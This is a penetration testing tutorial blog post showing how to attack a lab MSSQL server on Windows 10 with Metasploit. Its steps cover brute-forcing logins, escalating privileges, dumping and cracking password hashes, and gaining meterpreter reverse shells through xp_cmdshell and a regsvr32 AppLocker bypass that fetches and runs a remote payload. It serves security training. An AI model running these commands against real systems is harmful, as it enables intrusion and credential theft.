MSSQL Penetration Testing with Metasploit

Hello friends today we are performing MSSQL penetration testing using metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: Kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

1

2

3

4

5

useauxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login)>set rhost192.168.1.104

msf auxiliary(mssql_login)>set user_file/root/Desktop/user.txt

msf auxiliary(mssql_login)>set pass_file/root/Desktop/pass.txt

msf auxiliary(mssql_login)>run

This will perform brute force attack matching valid combination for username and password from given dictionary.

In specified image you can observe that we have successfully retrieve credential for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration setting

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

1

2

3

4

useauxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum)>set rhost192.168.1.104

msf auxiliary(mssql_enum)>set password admin123

msf auxiliary(mssql_enum)>run

Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:

Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute operating system command. Attacker can inject malicious command of file for making unauthorized access into server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all principal IDs resolve SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

1

2

3

4

useauxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins)>set rhost192.168.1.104

msf auxiliary(mssql_enum_sql_logins)>set password admin123

msf auxiliary(mssql_enum_sql_logins)>run

From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.

1

2

3

4

useauxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner)>set rhost192.168.1.104

msf auxiliary(mssql_escalate_dbowner)>set password admin123

msf auxiliary(mssql_escalate_dbowner)>run

Above module will identify whether specified user do have system administrator role or not. From given below image you can perceive that “sa” is sysadmin user.

Identify a User With masquerade privilege

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

1

2

3

4

useauxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as)>set rhost192.168.1.104

msf auxiliary(mssql_escalate_execute_as)>set password admin123

msf auxiliary(mssql_escalate_execute_as)>run

From given below image you can perceive that “sa” is sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given appropriate credentials.

1

2

3

4

useauxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql)>set rhost192.168.1.104

msf auxiliary(mssql_sql)>set password admin123

msf auxiliary(mssql_sql)>run

From given below image you can observe that by default it has run SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own sql statement.

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

1

2

3

4

useauxiliary/scanner/mssql/mssql_hashdump

msf auxiliary(mssql_hashdump)>set rhost192.168.1.104

msf auxiliary(mssql_hashdump)>set password admin123

msf auxiliary(mssql_hashdump)>run

From given below image you can read the hash value of password set for every database user in MMSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.

1

2

useauxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast)>run

Great!! The tool John the ripper has successfully decoded the hash value set for passwords.

Extracting MYSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

1

2

3

4

useauxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump)>set rhost192.168.1.104

msf auxiliary(mssql_schemadump)>set password admin123

msf auxiliary(mssql_schemadump)>run

Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:

DB: ignite

Table name: student_details

Ranking

(CT: Numeric ; CL =9)

NAME

(CT: nvarchar; CL =100)

Class

(CT: nchar; CL : =20)

Name

(CT: sysname; CL: = 100)

Execute malicious .dll code through xp-cmdshell as CMD statement

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

1

2

3

4

useexploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server)>set lhost192.168.1.115

msf exploit(regsvr32_applocker_bypass_server)>set lport4455

msf exploit(regsvr32_applocker_bypass_server)>run

Since we known xp_cmdshell function is enabled in SQL server therefore we can easy shoot the target machine by injecting a malicious .dll file through xp_cmdshell function.

After executing above module we will get malicious .dll code as highlighted in the below image, copy this code for injecting into xp_cmdshell as statement.

This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module.

If you will observe above command sets in specified module, you will notice that here we have set above copied malicious .dll code as CMD statement. Hence as soon as we will run this exploit it creates a backdoor in victim’s machine for unauthorized access.

Wonderful!! We have got reverse connection of target machine through meterpreter session.

Exploit xp_cmdshell vulnerability

This module executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows ‘debug.com’. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a executable payoad on the target system when the attack is finished.

1

2

3

4

5

useexploit/windows/mssql/mssql_payload

msf exploit(mssql_payload)>set rhost192.168.1.104

msf exploit(mssql_payload)>set password admin123

msf exploit(mssql_payload)>set srvhost192.168.1.115

msf exploit(mssql_payload)>run

Awesome!! We have got reverse connection of target machine through meterpreter session.

Share this:

Like this:

LikeLoading...

ABOUT THE AUTHOR

Raj Chandel

Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry